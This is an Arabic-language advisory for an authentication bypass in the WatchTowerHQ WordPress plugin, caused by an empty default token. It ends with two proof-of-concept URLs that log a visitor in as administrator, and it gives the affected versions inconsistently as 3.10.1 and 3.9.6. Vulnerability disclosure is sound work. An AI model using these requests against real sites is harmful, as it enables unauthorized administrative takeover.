
WatchTowerHQ <= 3.10.1 - تجاوز المصادقة للوصول إلى صلاحيات المسؤول بسبب غياب فحص القيمة الفارغة
WatchTowerHQ <= 3.10.1 - تجاوز المصادقة إلى المسؤول بسبب غياب التحقق من القيمة الفارغة
إن إضافة WatchTowerHQ الخاصة بـ WordPress معرضة لتجاوز المصادقة في الإصدارات حتى 3.9.6 وما يشملها. ويعزى ذلك إلى أن القيمة الافتراضية لـ 'watchtower_ota_token' فارغة، وأن فحص عدم الفراغ مفقود في دالة 'Password_Less_Access::login'. وهذا يتيح للمهاجمين غير المصادق عليهم تسجيل الدخول إلى مستخدم مسؤول عميل WatchTowerHQ.
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
http://kubernetes.docker.internal/?wht_login=1
OR
http://kubernetes.docker.internal/?wht_login=1&access_token=not_set
إذا كان الموقع ضعيفًا، فسيتم تسجيل دخولك كمسؤول.